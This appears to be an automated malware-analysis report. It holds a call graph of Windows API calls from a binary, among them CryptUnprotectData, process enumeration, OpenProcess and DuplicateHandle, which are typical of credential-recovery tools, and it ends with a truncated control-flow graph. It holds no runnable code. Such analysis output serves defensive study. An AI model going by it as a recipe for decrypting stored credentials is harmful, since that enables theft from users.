39180->39181 39182 405369 39181->39182 39182->38916 39182->38917 39183->38919 39184->38923 39185->38920 39186->38917 39188 40440c FreeLibrary 39187->39188 39189 40436d 39188->39189 39190 40a804 8 API calls 39189->39190 39191 404377 39190->39191 39192 404383 39191->39192 39193 404405 39191->39193 39194 40b273 27 API calls 39192->39194 39193->38488 39193->38489 39193->38490 39195 40438d GetProcAddress 39194->39195 39196 40b273 27 API calls 39195->39196 39197 4043a7 GetProcAddress 39196->39197 39198 40b273 27 API calls 39197->39198 39199 4043ba GetProcAddress 39198->39199 39200 40b273 27 API calls 39199->39200 39201 4043ce GetProcAddress 39200->39201 39202 40b273 27 API calls 39201->39202 39203 4043e2 GetProcAddress 39202->39203 39204 4043f1 39203->39204 39205 4043f7 39204->39205 39206 40440c FreeLibrary 39204->39206 39205->39193 39206->39193 39208 404413 FreeLibrary 39207->39208 39209 40441e 39207->39209 39208->39209 39209->38505 39210->38501 39212 40447e 39211->39212 39213 40442e 39211->39213 39214 404485 CryptUnprotectData 39212->39214 39215 40449c 39212->39215 39216 40b2cc 27 API calls 39213->39216 39214->39215 39215->38501 39217 404438 39216->39217 39218 40a804 8 API calls 39217->39218 39219 40443e 39218->39219 39220 404445 39219->39220 39221 404467 39219->39221 39222 40b273 27 API calls 39220->39222 39221->39212 39224 404475 FreeLibrary 39221->39224 39223 40444f GetProcAddress 39222->39223 39223->39221 39225 404460 39223->39225 39224->39212 39225->39221 39227 4135f6 39226->39227 39228 4135eb FreeLibrary 39226->39228 39227->38508 39228->39227 39230 4449c4 39229->39230 39231 444a52 39229->39231 39232 40b2cc 27 API calls 39230->39232 39231->38525 39231->38526 39233 4449cb 39232->39233 39234 40a804 8 API calls 39233->39234 39235 4449d1 39234->39235 39236 40b273 27 API calls 39235->39236 39237 4449dc GetProcAddress 39236->39237 39238 40b273 27 API calls 39237->39238 39239 4449f3 GetProcAddress 39238->39239 39240 40b273 27 API calls 39239->39240 39241 444a04 GetProcAddress 39240->39241 39242 40b273 27 API calls 39241->39242 39243 444a15 GetProcAddress 39242->39243 39244 40b273 27 API calls 39243->39244 39245 444a26 GetProcAddress 39244->39245 39246 40b273 27 API calls 39245->39246 39247 444a37 GetProcAddress 39246->39247 39250->38536 39251->38536 39252->38536 39253->38536 39254->38527 39256 403a29 39255->39256 39270 403bed memset memset 39256->39270 39258 403ae7 39283 40b1ab free free 39258->39283 39260 403a3f memset 39264 403a2f 39260->39264 39261 403aef 39261->38544 39262 40a8d0 7 API calls 39262->39264 39263 409d1f 6 API calls 39263->39264 39264->39258 39264->39260 39264->39262 39264->39263 39265 409b98 GetFileAttributesW 39264->39265 39265->39264 39267 40a051 GetFileTime CloseHandle 39266->39267 39268 4039ca CompareFileTime 39266->39268 39267->39268 39268->38544 39269->38543 39271 414c2e 17 API calls 39270->39271 39272 403c38 39271->39272 39273 409719 2 API calls 39272->39273 39274 403c3f wcscat 39273->39274 39275 414c2e 17 API calls 39274->39275 39276 403c61 39275->39276 39277 409719 2 API calls 39276->39277 39278 403c68 wcscat 39277->39278 39284 403af5 39278->39284 39281 403af5 20 API calls 39282 403c95 39281->39282 39282->39264 39283->39261 39285 403b02 39284->39285 39286 40ae18 9 API calls 39285->39286 39294 403b37 39286->39294 39287 403bdb 39288 40aebe FindClose 39287->39288 39290 403be6 39288->39290 39289 40add4 wcscmp wcscmp 39289->39294 39290->39281 39291 40ae18 9 API calls 39291->39294 39292 40ae51 9 API calls 39292->39294 39293 40aebe FindClose 39293->39294 39294->39287 39294->39289 39294->39291 39294->39292 39294->39293 39295 40a8d0 7 API calls 39294->39295 39295->39294 39297 409d1f 6 API calls 39296->39297 39298 404190 39297->39298 39311 409b98 GetFileAttributesW 39298->39311 39300 40419c 39301 4041a7 6 API calls 39300->39301 39302 40435c 39300->39302 39304 40424f 39301->39304 39302->38570 39304->39302 39305 40425e memset 39304->39305 39307 409d1f 6 API calls 39304->39307 39308 40a8ab 9 API calls 39304->39308 39312 414842 39304->39312 39305->39304 39306 404296 wcscpy 39305->39306 39306->39304 39307->39304 39309 4042b6 memset memset _snwprintf wcscpy 39308->39309 39309->39304 39310->38568 39311->39300 39315 41443e 39312->39315 39314 414866 39314->39304 39316 41444b 39315->39316 39317 414451 39316->39317 39318 4144a3 GetPrivateProfileStringW 39316->39318 39319 414491 39317->39319 39320 414455 wcschr 39317->39320 39318->39314 39322 414495 WritePrivateProfileStringW 39319->39322 39320->39319 39321 414463 _snwprintf 39320->39321 39321->39322 39322->39314 39323->38574 39325 40b2cc 27 API calls 39324->39325 39326 409615 39325->39326 39327 409d1f 6 API calls 39326->39327 39328 409625 39327->39328 39353 409b98 GetFileAttributesW 39328->39353 39330 409634 39331 409648 39330->39331 39354 4091b8 memset 39330->39354 39333 40b2cc 27 API calls 39331->39333 39336 408801 39331->39336 39334 40965d 39333->39334 39335 409d1f 6 API calls 39334->39335 39337 40966d 39335->39337 39336->38577 39336->38604 39406 409b98 GetFileAttributesW 39337->39406 39339 40967c 39339->39336 39340 409681 39339->39340 39407 409529 72 API calls 39340->39407 39342 409690 39342->39336 39353->39330 39408 40a6e6 WideCharToMultiByte 39354->39408 39356 409202 39409 444432 39356->39409 39359 40b273 27 API calls 39360 409236 39359->39360 39455 438552 39360->39455 39363 409383 39365 40b273 27 API calls 39363->39365 39366 409399 39365->39366 39369 438552 134 API calls 39366->39369 39386 40951d 39386->39331 39406->39339 39407->39342 39408->39356 39505 4438b5 39409->39505 39411 44444c 39412 409215 39411->39412 39519 415a6d 39411->39519 39412->39359 39412->39386 39414 4442e6 11 API calls 39416 44469e 39414->39416 39415 444486 39417 4444b9 memcpy 39415->39417 39454 4444a4 39415->39454 39416->39412 39419 443d90 111 API calls 39416->39419 39523 415258 39417->39523 39419->39412 39420 444524 39421 444541 39420->39421 39422 44452a 39420->39422 39526 444316 39421->39526 39423 416935 16 API calls 39422->39423 39423->39454 39426 444316 18 API calls 39427 444563 39426->39427 39428 444316 18 API calls 39427->39428 39454->39414 39644 438460 39455->39644 39457 409240 39457->39363 39458 4251c4 39457->39458 39695 424f07 39458->39695 39506 4438d0 39505->39506 39516 4438c9 39505->39516 39593 415378 memcpy memcpy 39506->39593 39516->39411 39520 415a77 39519->39520 39521 415a8d 39520->39521 39522 415a7e memset 39520->39522 39521->39415 39522->39521 39524 4438b5 11 API calls 39523->39524 39525 41525d 39524->39525 39525->39420 39527 444328 39526->39527 39528 444423 39527->39528 39529 44434e 39527->39529 39594 4446ea 11 API calls 39528->39594 39530 432d4e 3 API calls 39529->39530 39532 44435a 39530->39532 39534 444375 39532->39534 39539 44438b 39532->39539 39533 432d4e 3 API calls 39536 416935 16 API calls 39534->39536 39537 444381 39536->39537 39537->39426 39539->39533 39594->39537 39656 41703f 39644->39656 39646 43847a 39647 43848a 39646->39647 39648 43847e 39646->39648 39663 438270 39647->39663 39693 4446ea 11 API calls 39648->39693 39655 438488 39655->39457 39657 417044 39656->39657 39658 41705c 39656->39658 39660 416760 11 API calls 39657->39660 39662 417055 39657->39662 39659 417075 39658->39659 39661 41707a 11 API calls 39658->39661 39659->39646 39660->39662 39661->39657 39662->39646 39664 415a91 memset 39663->39664 39665 43828d 39664->39665 39666 438297 39665->39666 39667 438341 39665->39667 39669 4382d6 39665->39669 39668 415c7d 16 API calls 39666->39668 39670 44358f 19 API calls 39667->39670 39671 438458 39668->39671 39672 4382fb 39669->39672 39673 4382db 39669->39673 39683 438318 39670->39683 39671->39655 39694 424f26 123 API calls 39671->39694 39675 415c23 memcpy 39672->39675 39674 416935 16 API calls 39673->39674 39676 4382e9 39674->39676 39677 438305 39675->39677 39677->39683 39679 438373 39681 43819e 115 API calls 39681->39679 39683->39679 39683->39681 39693->39655 39696 424f1f 39695->39696 39697 424f0c 39695->39697 39716 424eea 11 API calls 39696->39716 39715 416760 11 API calls 39697->39715 39700 424f18 39701 424f24 39715->39700 39716->39701 39794 413f4f 39767->39794 39770 413f37 K32GetModuleFileNameExW 39771 413f4a 39770->39771 39771->38634 39773 413969 wcscpy 39772->39773 39774 41396c wcschr 39772->39774 39777 413a3a 39773->39777 39774->39773 39776 41398e 39774->39776 39799 4097f7 wcslen wcslen _memicmp 39776->39799 39777->38634 39779 41399a 39780 4139a4 memset 39779->39780 39781 4139e6 39779->39781 39800 409dd5 GetWindowsDirectoryW wcscpy 39780->39800 39783 413a31 wcscpy 39781->39783 39784 4139ec memset 39781->39784 39783->39777 39801 409dd5 GetWindowsDirectoryW wcscpy 39784->39801 39785 4139c9 wcscpy wcscat 39785->39777 39787 413a11 memcpy wcscat 39787->39777 39789 413cb0 GetModuleHandleW 39788->39789 39790 413cda 39788->39790 39789->39790 39793 413cbf GetProcAddress 39789->39793 39791 413ce3 GetProcessTimes 39790->39791 39792 413cf6 39790->39792 39791->38639 39792->38639 39793->39790 39795 413f2f 39794->39795 39796 413f54 39794->39796 39795->39770 39795->39771 39797 40a804 8 API calls 39796->39797 39798 413f5f GetProcAddress GetProcAddress GetProcAddress GetProcAddress GetProcAddress 39797->39798 39798->39795 39799->39779 39800->39785 39801->39787 39802->38659 39803->38683 39805 409cf9 GetVersionExW 39804->39805 39806 409d0a 39804->39806 39805->39806 39806->38688 39806->38694 39807->38695 39808->38699 39809->38701 39810->38767 39812 40bba5 39811->39812 39856 40cc26 39812->39856 39815 40bd4b 39877 40cc0c 39815->39877 39820 40b2cc 27 API calls 39821 40bbef 39820->39821 39884 40ccf0 _wcsicmp 39821->39884 39823 40bbf5 39823->39815 39885 40ccb4 6 API calls 39823->39885 39825 40bc26 39826 40cf04 17 API calls 39825->39826 39827 40bc2e 39826->39827 39828 40bd43 39827->39828 39829 40b2cc 27 API calls 39827->39829 39830 40cc0c 4 API calls 39828->39830 39831 40bc40 39829->39831 39830->39815 39886 40ccf0 _wcsicmp 39831->39886 39833 40bc46 39833->39828 39834 40bc61 memset memset WideCharToMultiByte 39833->39834 39887 40103c strlen 39834->39887 39836 40bcc0 39837 40b273 27 API calls 39836->39837 39838 40bcd0 memcmp 39837->39838 39838->39828 39839 40bce2 39838->39839 39840 404423 38 API calls 39839->39840 39841 40bd10 39840->39841 39841->39828 39842 40bd3a LocalFree 39841->39842 39843 40bd1f memcpy 39841->39843 39842->39828 39843->39842 39844->38782 39845->38819 39846->38819 39847->38819 39848->38819 39849->38819 39850->38819 39851->38819 39852->38819 39853->38819 39854->38794 39855->38816 39888 4096c3 CreateFileW 39856->39888 39858 40cc34 39859 40cc3d GetFileSize 39858->39859 39867 40bbca 39858->39867 39860 40afcf 2 API calls 39859->39860 39861 40cc64 39860->39861 39889 40a2ef ReadFile 39861->39889 39863 40cc71 39890 40ab4a MultiByteToWideChar 39863->39890 39865 40cc95 CloseHandle 39866 40b04b ??3@YAXPAX 39865->39866 39866->39867 39867->39815 39868 40cf04 39867->39868 39869 40b633 free 39868->39869 39870 40cf14 39869->39870 39896 40b1ab free free 39870->39896 39872 40cf1b 39873 40cfef 39872->39873 39876 40bbdd 39872->39876 39897 40cd4b 39872->39897 39875 40cd4b 14 API calls 39873->39875 39875->39876 39876->39815 39876->39820 39878 40b633 free 39877->39878 39879 40cc15 39878->39879 39880 40aa04 free 39879->39880 39881 40cc1d 39880->39881 39943 40b1ab free free 39881->39943 39883 40b7d4 memset CreateFileW 39883->38774 39883->38775 39884->39823 39885->39825 39886->39833 39887->39836 39888->39858 39889->39863 39891 40ab93 39890->39891 39892 40ab6b 39890->39892 39891->39865 39893 40a9ce 4 API calls 39892->39893 39894 40ab74 39893->39894 39895 40ab7c MultiByteToWideChar 39894->39895 39895->39891 39896->39872 39898 40cd7b 39897->39898 39931 40aa29 6 API calls 39898->39931 39900 40cef5 39901 40aa04 free 39900->39901 39902 40cefd 39901->39902 39902->39872 39903 40cd89 39903->39900 39932 40aa29 6 API calls 39903->39932 39905 40ce1d 39933 40aa29 6 API calls 39905->39933 39907 40ce3e 39908 40ce6a 39907->39908 39934 40abb7 wcslen memmove 39907->39934 39909 40ce9f 39908->39909 39937 40abb7 wcslen memmove 39908->39937 39940 40a8d0 7 API calls 39909->39940 39913 40ce56 39935 40aa71 wcslen 39913->39935 39914 40ce8b 39938 40aa71 wcslen 39914->39938 39915 40ceb5 39941 40a8d0 7 API calls 39915->39941 39918 40ce5e 39936 40abb7 wcslen memmove 39918->39936 39920 40ce93 39939 40abb7 wcslen memmove 39920->39939 39922 40cecb 39942 40d00b malloc memcpy free free 39922->39942 39925 40cedd 39926 40aa04 free 39925->39926 39927 40cee5 39926->39927 39928 40aa04 free 39927->39928 39929 40ceed 39928->39929 39930 40aa04 free 39929->39930 39930->39900 39931->39903 39932->39905 39933->39907 39934->39913 39935->39918 39936->39908 39937->39914 39938->39920 39939->39909 39940->39915 39941->39922 39942->39925 39943->39883 39944->38834 39945->38842 39946 427533 39950 427548 39946->39950 39959 425711 39946->39959 39947 4259da 40003 416760 11 API calls 39947->40003 39949 4275cb 39983 425506 39949->39983 39950->39949 39957 429b7a 39950->39957 39951 4260dd 40004 424251 120 API calls 39951->40004 39952 4259c2 39979 425ad6 39952->39979 39997 415c56 11 API calls 39952->39997 40009 4446ce 11 API calls 39957->40009 39959->39947 39959->39952 39962 429a4d 39959->39962 39965 422aeb memset memcpy memcpy 39959->39965 39969 4260a1 39959->39969 39975 429ac1 39959->39975 39982 425a38 39959->39982 39993 4227f0 memset memcpy 39959->39993 39994 422b84 15 API calls 39959->39994 39995 422b5d memset memcpy memcpy 39959->39995 39996 422640 13 API calls 39959->39996 39998 4241fc 11 API calls 39959->39998 39999 42413a 90 API calls 39959->39999 39963 429a66 39962->39963 39964 429a9b 39962->39964 40005 415c56 11 API calls 39963->40005 39968 429a96 39964->39968 40007 416760 11 API calls 39964->40007 39965->39959 40008 424251 120 API calls 39968->40008 40002 415c56 11 API calls 39969->40002 39971 429a7a 40006 416760 11 API calls 39971->40006 39975->39947 39975->39979 40010 415c56 11 API calls 39975->40010 39982->39952 40000 422640 13 API calls 39982->40000 40001 4226e0 12 API calls 39982->40001 39984 42554d 39983->39984 39987 425554 39983->39987 40011 423b34 103 API calls 39984->40011 40012 422586 12 API calls 39987->40012 39988 425567 39989 4255ba 39988->39989 39990 42556c memset 39988->39990 39989->39959 39991 425596 39990->39991 39991->39989 39992 4255a4 memset 39991->39992 39992->39989 39993->39959 39994->39959 39995->39959 39996->39959 39997->39947 39998->39959 39999->39959 40000->39982 40001->39982 40002->39947 40003->39951 40004->39979 40005->39971 40006->39968 40007->39968 40008->39975 40009->39975 40010->39947 40011->39987 40012->39988 40013 4147f3 40016 414561 40013->40016 40015 414813 40017 41456d 40016->40017 40018 41457f GetPrivateProfileIntW 40016->40018 40021 4143f1 memset _itow WritePrivateProfileStringW 40017->40021 40018->40015 40020 41457a 40020->40015 40021->40020 40022 44def7 40023 44df07 40022->40023 40024 44df00 ??3@YAXPAX 40022->40024 40025 44df17 40023->40025 40026 44df10 ??3@YAXPAX 40023->40026 40024->40023 40027 44df27 40025->40027 40028 44df20 ??3@YAXPAX 40025->40028 40026->40025 40029 44df37 40027->40029 40030 44df30 ??3@YAXPAX 40027->40030 40028->40027 40030->40029 40031 4148b6 FindResourceW 40032 4148cf SizeofResource 40031->40032 40035 4148f9 40031->40035 40033 4148e0 LoadResource 40032->40033 40032->40035 40034 4148ee LockResource 40033->40034 40033->40035 40034->40035 40036 441b3f 40046 43a9f6 40036->40046 40038 441b61 40219 4386af memset 40038->40219 40040 44189a 40041 442bd4 40040->40041 40042 4418e2 40040->40042 40043 4418ea 40041->40043 40221 441409 memset 40041->40221 40042->40043 40220 4414a9 12 API calls 40042->40220 40047 43aa20 40046->40047 40048 43aadf 40046->40048 40047->40048 40049 43aa34 memset 40047->40049 40048->40038 40050 43aa56 40049->40050 40051 43aa4d 40049->40051 40222 43a6e7 40050->40222 40230 42c02e memset 40051->40230 40056 43aad3 40232 4169a7 11 API calls 40056->40232 40057 43aaae 40057->40048 40057->40056 40072 43aae5 40057->40072 40059 43ac18 40061 43ac47 40059->40061 40234 42bbd5 memcpy memcpy memcpy memset memcpy 40059->40234 40062 43aca8 40061->40062 40235 438eed 16 API calls 40061->40235 40066 43acd5 40062->40066 40237 4233ae 11 API calls 40062->40237 40065 43ac87 40236 4233c5 16 API calls 40065->40236 40238 423426 11 API calls 40066->40238 40070 43ace1 40239 439811 163 API calls 40070->40239 40071 43a9f6 161 API calls 40071->40072 40072->40048 40072->40059 40072->40071 40233 439bbb 22 API calls 40072->40233 40074 43acfd 40080 43ad2c 40074->40080 40240 438eed 16 API calls 40074->40240 40076 43ad19 40241 4233c5 16 API calls 40076->40241 40078 43ad58 40242 44081d 163 API calls 40078->40242 40080->40078 40082 43add9 40080->40082 40082->40082 40246 423426 11 API calls 40082->40246 40083 43ae3a memset 40084 43ae73 40083->40084 40247 42e1c0 147 API calls 40084->40247 40085 43adab 40244 438c4e 163 API calls 40085->40244 40087 43ad6c 40087->40048 40087->40085 40243 42370b memset memcpy memset 40087->40243 40089 43ae96 40248 42e1c0 147 API calls 40089->40248 40091 43adcc 40245 440f84 12 API calls 40091->40245 40094 43aea8 40095 43aec1 40094->40095 40249 42e199 147 API calls 40094->40249 40097 43af00 40095->40097 40250 42e1c0 147 API calls 40095->40250 40097->40048 40100 43af1a 40097->40100 40101 43b3d9 40097->40101 40251 438eed 16 API calls 40100->40251 40106 43b3f6 40101->40106 40113 43b4c8 40101->40113 40103 43b60f 40103->40048 40310 4393a5 17 API calls 40103->40310 40104 43af2f 40252 4233c5 16 API calls 40104->40252 40292 432878 12 API calls 40106->40292 40108 43af51 40253 423426 11 API calls 40108->40253 40111 43af7d 40254 423426 11 API calls 40111->40254 40112 43b4f2 40299 43a76c 21 API calls 40112->40299 40113->40112 40298 42bbd5 memcpy memcpy memcpy memset memcpy 40113->40298 40117 43b529 40300 44081d 163 API calls 40117->40300 40118 43b428 40146 43b462 40118->40146 40293 432b60 16 API calls 40118->40293 40119 43af94 40255 423330 11 API calls 40119->40255 40123 43b47e 40126 43b497 40123->40126 40295 42374a memcpy memset memcpy memcpy memcpy 40123->40295 40124 43b544 40134 43b55c 40124->40134 40301 42c02e memset 40124->40301 40125 43afca 40256 423330 11 API calls 40125->40256 40296 4233ae 11 API calls 40126->40296 40131 43afdb 40257 4233ae 11 API calls 40131->40257 40133 43b4b1 40297 423399 11 API calls 40133->40297 40302 43a87a 163 API calls 40134->40302 40136 43b56c 40139 43b58a 40136->40139 40303 423330 11 API calls 40136->40303 40138 43afee 40258 44081d 163 API calls 40138->40258 40304 440f84 12 API calls 40139->40304 40141 43b4c1 40306 42db80 163 API calls 40141->40306 40145 43b592 40305 43a82f 16 API calls 40145->40305 40294 423330 11 API calls 40146->40294 40149 43b5b4 40307 438c4e 163 API calls 40149->40307 40151 43b5cf 40308 42c02e memset 40151->40308 40153 43b005 40153->40048 40158 43b01f 40153->40158 40259 42d836 163 API calls 40153->40259 40154 43b1ef 40269 4233c5 16 API calls 40154->40269 40156 43b212 40270 423330 11 API calls 40156->40270 40158->40154 40267 423330 11 API calls 40158->40267 40268 42d71d 163 API calls 40158->40268 40160 43add4 40160->40103 40309 438f86 16 API calls 40160->40309 40163 43b087 40260 4233ae 11 API calls 40163->40260 40164 43b22a 40271 42ccb5 11 API calls 40164->40271 40167 43b10f 40263 423330 11 API calls 40167->40263 40168 43b23f 40272 4233ae 11 API calls 40168->40272 40170 43b257 40273 4233ae 11 API calls 40170->40273 40174 43b129 40264 4233ae 11 API calls 40174->40264 40175 43b26e 40274 4233ae 11 API calls 40175->40274 40177 43b09a 40177->40167 40261 42cc15 19 API calls 40177->40261 40262 4233ae 11 API calls 40177->40262 40179 43b282 40275 43a87a 163 API calls 40179->40275 40181 43b13c 40265 440f84 12 API calls 40181->40265 40183 43b29d 40276 423330 11 API calls 40183->40276 40186 43b15f 40266 4233ae 11 API calls 40186->40266 40187 43b2af 40189 43b2b8 40187->40189 40190 43b2ce 40187->40190 40277 4233ae 11 API calls 40189->40277 40278 440f84 12 API calls 40190->40278 40193 43b2c9 40280 4233ae 11 API calls 40193->40280 40194 43b2da 40279 42370b memset memcpy memset 40194->40279 40197 43b2f9 40281 423330 11 API calls 40197->40281 40199 43b30b 40282 423330 11 API calls 40199->40282 40201 43b325 40283 423399 11 API calls 40201->40283 40203 43b332 40284 4233ae 11 API calls 40203->40284 40205 43b354 40285 423399 11 API calls 40205->40285 40207 43b364 40286 43a82f 16 API calls 40207->40286 40209 43b370 40287 42db80 163 API calls 40209->40287 40211 43b380 40288 438c4e 163 API calls 40211->40288 40213 43b39e 40289 423399 11 API calls 40213->40289 40215 43b3ae 40290 43a76c 21 API calls 40215->40290 40217 43b3c3 40291 423399 11 API calls 40217->40291 40219->40040 40220->40043 40221->40041 40223 43a6f5 40222->40223 40229 43a765 40222->40229 40223->40229 40311 42a115 40223->40311 40227 43a73d 40228 42a115 147 API calls 40227->40228 40227->40229 40228->40229 40229->40048 40231 4397fd memset 40229->40231 40230->40050 40231->40057 40232->40048 40233->40072 40234->40061 40235->40065 40236->40062 40237->40066 40238->40070 40239->40074 40240->40076 40241->40080 40242->40087 40243->40085 40244->40091 40245->40160 40246->40083 40247->40089 40248->40094 40249->40095 40250->40095 40251->40104 40252->40108 40253->40111 40254->40119 40255->40125 40256->40131 40257->40138 40258->40153 40259->40163 40260->40177 40261->40177 40262->40177 40263->40174 40264->40181 40265->40186 40266->40158 40267->40158 40268->40158 40269->40156 40270->40164 40271->40168 40272->40170 40273->40175 40274->40179 40275->40183 40276->40187 40277->40193 40278->40194 40279->40193 40280->40197 40281->40199 40282->40201 40283->40203 40284->40205 40285->40207 40286->40209 40287->40211 40288->40213 40289->40215 40290->40217 40291->40160 40292->40118 40293->40146 40294->40123 40295->40126 40296->40133 40297->40141 40298->40112 40299->40117 40300->40124 40301->40134 40302->40136 40303->40139 40304->40145 40305->40141 40306->40149 40307->40151 40308->40160 40309->40103 40310->40048 40312 42a175 40311->40312 40314 42a122 40311->40314 40312->40229 40317 42b13b 147 API calls 40312->40317 40314->40312 40315 42a115 147 API calls 40314->40315 40318 43a174 40314->40318 40342 42a0a8 147 API calls 40314->40342 40315->40314 40317->40227 40332 43a196 40318->40332 40333 43a19e 40318->40333 40319 43a306 40319->40332 40358 4388c4 14 API calls 40319->40358 40322 42a115 147 API calls 40322->40333 40323 415a91 memset 40323->40333 40324 43a642 40324->40332 40362 4169a7 11 API calls 40324->40362 40328 43a635 40361 42c02e memset 40328->40361 40332->40314 40333->40319 40333->40322 40333->40323 40333->40332 40343 42ff8c 40333->40343 40351 4165ff 40333->40351 40354 439504 13 API calls 40333->40354 40355 4312d0 147 API calls 40333->40355 40356 42be4c memcpy memcpy memcpy memset memcpy 40333->40356 40357 43a121 11 API calls 40333->40357 40335 4169a7 11 API calls 40336 43a325 40335->40336 40336->40324 40336->40328 40336->40332 40336->40335 40337 42b5b5 memset memcpy 40336->40337 40338 42bf4c 14 API calls 40336->40338 40341 4165ff 11 API calls 40336->40341 40359 42b63e 14 API calls 40336->40359 40360 42bfcf memcpy 40336->40360 40337->40336 40338->40336 40341->40336 40342->40314 40363 43817e 40343->40363 40345 42ff99 40346 42ffe3 40345->40346 40347 42ffd0 40345->40347 40350 42ff9d 40345->40350 40368 4169a7 11 API calls 40346->40368 40367 4169a7 11 API calls 40347->40367 40350->40333 40352 4165a0 11 API calls 40351->40352 40353 41660d 40352->40353 40353->40333 40354->40333 40355->40333 40356->40333 40357->40333 40358->40336 40359->40336 40360->40336 40361->40324 40362->40332 40364 438187 40363->40364 40366 438192 40363->40366 40369 4380f6 40364->40369 40366->40345 40367->40350 40368->40350 40371 43811f 40369->40371 40370 438164 40370->40366 40371->40370 40373 4300e8 3 API calls 40371->40373 40374 437e5e 40371->40374 40373->40371 40397 437d3c 40374->40397 40376 437eb3 40376->40371 40377 437ea9 40377->40376 40383 437f22 40377->40383 40412 41f432 40377->40412 40380 437f06 40459 415c56 11 API calls 40380->40459 40382 437f95 40460 415c56 11 API calls 40382->40460 40384 437f7f 40383->40384 40385 432d4e 3 API calls 40383->40385 40384->40382 40387 43802b 40384->40387 40385->40384 40388 4165ff 11 API calls 40387->40388 40389 438054 40388->40389 40423 437371 40389->40423 40392 43806b 40393 438094 40392->40393 40461 42f50e 138 API calls 40392->40461 40395 437fa3 40393->40395 40396 4300e8 3 API calls 40393->40396 40395->40376 40462 41f638 104 API calls 40395->40462 40396->40395 40398 437d69 40397->40398 40401 437d80 40397->40401 40463 437ccb 11 API calls 40398->40463 40400 437d76 40400->40377 40401->40400 40402 437da3 40401->40402 40403 437d90 40401->40403 40405 438460 134 API calls 40402->40405 40403->40400 40467 437ccb 11 API calls 40403->40467 40408 437dcb 40405->40408 40407 437de8 40466 424f26 123 API calls 40407->40466 40408->40407 40464 444283 13 API calls 40408->40464 40410 437dfc 40465 437ccb 11 API calls 40410->40465 40413 41f54d 40412->40413 40419 41f44f 40412->40419 40414 41f466 40413->40414 40497 41c635 memset memset 40413->40497 40414->40380 40414->40383 40419->40414 40421 41f50b 40419->40421 40468 41f1a5 40419->40468 40493 41c06f memcmp 40419->40493 40494 41f3b1 90 API calls 40419->40494 40495 41f398 86 API calls 40419->40495 40421->40413 40421->40414 40496 41c295 86 API calls 40421->40496 40424 41703f 11 API calls 40423->40424 40425 437399 40424->40425 40426 43739d 40425->40426 40429 4373ac 40425->40429 40498 4446ea 11 API calls 40426->40498 40428 4373a7 40428->40392 40430 416935 16 API calls 40429->40430 40431 4373ca 40430->40431 40433 438460 134 API calls 40431->40433 40437 4251c4 137 API calls 40431->40437 40441 415a91 memset 40431->40441 40444 43758f 40431->40444 40456 437584 40431->40456 40458 437d3c 135 API calls 40431->40458 40499 425433 13 API calls 40431->40499 40500 425413 17 API calls 40431->40500 40501 42533e 16 API calls 40431->40501 40502 42538f 16 API calls 40431->40502 40503 42453e 123 API calls 40431->40503 40432 4375bc 40435 415c7d 16 API calls 40432->40435 40433->40431 40436 4375d2 40435->40436 40436->40428 40438 4442e6 11 API calls 40436->40438 40437->40431 40439 4375e2 40438->40439 40439->40428 40506 444283 13 API calls 40439->40506 40441->40431 40504 42453e 123 API calls 40444->40504 40445 4375f4 40450 437620 40445->40450 40451 43760b 40445->40451 40449 43759f 40452 416935 16 API calls 40449->40452 40454 416935 16 API calls 40450->40454 40507 444283 13 API calls 40451->40507 40452->40456 40454->40428 40456->40432 40505 42453e 123 API calls 40456->40505 40457 437612 memcpy 40457->40428 40458->40431 40459->40376 40460->40395 40461->40393 40462->40376 40463->40400 40464->40410 40465->40407 40466->40400 40467->40400 40469 41bc3b 101 API calls 40468->40469 40470 41f1b4 40469->40470 40471 41edad 86 API calls 40470->40471 40478 41f282 40470->40478 40472 41f1cb 40471->40472 40473 41f1f5 memcmp 40472->40473 40474 41f20e 40472->40474 40472->40478 40473->40474 40475 41f21b memcmp 40474->40475 40474->40478 40476 41f326 40475->40476 40479 41f23d 40475->40479 40477 41ee6b 86 API calls 40476->40477 40476->40478 40477->40478 40478->40419 40479->40476 40480 41f28e memcmp 40479->40480 40482 41c8df 56 API calls 40479->40482 40480->40476 40481 41f2a9 40480->40481 40481->40476 40484 41f308 40481->40484 40485 41f2d8 40481->40485 40483 41f269 40482->40483 40483->40476 40486 41f287 40483->40486 40487 41f27a 40483->40487 40484->40476 40491 4446ce 11 API calls 40484->40491 40488 41ee6b 86 API calls 40485->40488 40486->40480 40489 41ee6b 86 API calls 40487->40489 40490 41f2e0 40488->40490 40489->40478 40492 41b1ca memset 40490->40492 40491->40476 40492->40478 40493->40419 40494->40419 40495->40419 40496->40413 40497->40414 40498->40428 40499->40431 40500->40431 40501->40431 40502->40431 40503->40431 40504->40449 40505->40432 40506->40445 40507->40457 40508 441819 40511 430737 40508->40511 40510 441825 40512 430756 40511->40512 40524 43076d 40511->40524 40513 430774 40512->40513 40514 43075f 40512->40514 40526 43034a memcpy 40513->40526 40525 4169a7 11 API calls 40514->40525 40517 4307ce 40519 430819 memset 40517->40519 40527 415b2c 11 API calls 40517->40527 40518 43077e 40518->40517 40522 4307fa 40518->40522 40518->40524 40519->40524 40521 4307e9 40521->40519 40521->40524 40528 4169a7 11 API calls 40522->40528 40524->40510 40525->40524 40526->40518 40527->40521 40528->40524 40529 41493c EnumResourceNamesW

                                                                                                    Control-flow Graph

                                                                                                    • Executed
                                                                                                    • Not Executed
                                                                                                    control_flow_graph 338 40dd85-40ddeb memset call 409bca CreateFileW 341 40ddf1-40de09 call 40afcf call 41352f 338->341 346 40de0b-40de1a NtQuerySystemInformation 341->346 347 40de1c 341->347 348 40de20-40de27 346->348 347->348 349 40de29-40de39 348->349 350 40de3b-40de52 CloseHandle GetCurrentProcessId 348->350 349->341 349->350 351 40de54-40de58 350->351 352 40de7a-40de8e call 413cfa call 413d4c 350->352 351->352 353 40de5a 351->353 362 40de94-40debb call 40e6ad call 409c52 _wcsicmp 352->362 363 40e00c-40e01b call 413d29 352->363 355 40de5d-40de63 353->355 357 40de74-40de78 355->357 358 40de65-40de6c 355->358 357->352 357->355 358->357 360 40de6e-40de71 358->360 360->357 370 40dee7-40def7 OpenProcess 362->370 371 40debd-40dece _wcsicmp 362->371 373 40dff8-40dffb 370->373 374 40defd-40df02 370->374 371->370 372 40ded0-40dee1 _wcsicmp 371->372 372->370 375 40dffd-40e006 372->375 373->363 373->375 376 40df08 374->376 377 40dfef-40dff2 CloseHandle 374->377 375->362 375->363 378 40df0b-40df10 376->378 377->373 379 40df16-40df1d 378->379 380 40dfbd-40dfcb 378->380 379->380 382 40df23-40df4a GetCurrentProcess DuplicateHandle 379->382 380->378 381 40dfd1-40dfd3 380->381 381->377 382->380 383 40df4c-40df76 memset call 41352f 382->383 386 40df78-40df8a 383->386 387 